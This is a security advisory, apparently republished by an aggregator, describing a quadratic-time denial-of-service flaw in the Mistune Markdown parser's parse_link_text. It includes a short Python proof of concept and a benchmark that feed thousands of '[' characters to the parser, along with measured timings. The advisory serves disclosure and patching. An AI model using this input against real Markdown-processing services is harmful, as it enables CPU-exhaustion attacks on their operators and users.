GHSA-qcq2-496w-v96p: Mistune: Potential DoS via quadratic-time parsing in parse_link_text
Summary
Mistune is vulnerable to a CPU exhaustion DoS due to superlinear (approximately O(n²)) behavior in parse_link_text. A relatively small input consisting of repeated [ characters causes significant parsing slowdown.
Affected component
mistune/inline_parser.py → **parse_link_text**
Description
When parsing Markdown containing many consecutive [ characters, parse_link_text repeatedly scans the input using a regex search inside a loop. Each iteration re-scans a large portion of the remaining string, resulting in quadratic-time behavior.
An attacker-controlled Markdown input can therefore trigger excessive CPU usage with a very small payload.
Root cause
The vulnerability stems from a two-loop interaction:
- The outer loop in InlineParser.parse() (inline_parser.py) advances
only 1 character at a time when parse_link() returns None
- Each failed attempt calls parse_link_text() which performs an O(n)
scan to the end of the string looking for a closing ]
- With n consecutive [ characters, this results in O(n) × O(n) = O(n²)
total work
PoC
Run below python script
import mistune
import time
md = mistune.create_markdown()
s = "[" * 6400
t = time.perf_counter()
md(s)
print(time.perf_counter() - t)
<img width="2028" height="1277" alt="image" src="https://github.com/user-attachments/assets/15d5bc0b-35f8-4a15-85e0-cbc314a45b06" />
Benmark poc
Run below code for benchmark
import mistune
import time
md = mistune.create_markdown()
sizes = [100,200,400,800,1600,3200,6400]
for n in sizes:
s = "[" * n
t0 = time.perf_counter()
md(s)
dt = time.perf_counter() - t0
print(f"{n:6d} {dt:.6f}")
<img width="2503" height="1341" alt="image" src="https://github.com/user-attachments/assets/f09a7bbb-6927-4ba2-afb1-444dd913b84e" />
Observed behaviour
python3 benchmark.py
100 0.001609
200 0.003207
400 0.012906
800 0.050220
1600 0.197307
3200 0.801172
6400 3.190393
Execution time grows superlinearly, consistent with O(n²) complex
Impact
This can be used as a denial-of-service
Details
Original advisory: https://github.com/advisories/GHSA-qcq2-496w-v96p
Exploitation outlook
EPSS (FIRST.org) estimates each CVE’s probability of exploitation in the next 30 days — here is the CSIRTS.com read on those numbers.
- Low exploitation riskCVE-2026-498510.35% 30-day exploitation probability — currently an unlikely target, but scores change as exploit code circulates. Riskier than 27% of all scored CVEs.
Referenced CVEs
| CVE | CSIRTS overview | External |
|---|---|---|
| CVE-2026-49851 | coverage & exploitation status | NVD · CVE.org |
Same CVEs, other sources
How other CERTs, PSIRTs and databases cover the vulnerabilities in this advisory.
More from GitHub Security Advisories
- criticalGHSA-g936-7jqj-mwv8: TSDProxy: Internal proxy auth token forwarded to backend services enables management API …2026-07-10
- highGHSA-fpg8-7664-jc5q: melange: Incomplete package integrity verification allows data section substitution2026-07-10
- mediumGHSA-48rx-c7pg-q66r: Excon does not redact additional sensitive/risky headers when following redirects2026-07-10
- highGHSA-h4g2-xfmw-q2c9: Clauster: Non-loopback deployments can serve the dashboard unauthenticated when auth.enab…2026-07-10
- mediumGHSA-rqq5-2gf9-4w4q: Secure Headers: CSP directive injection via sandbox, plugin_types, and report_to when giv…2026-07-10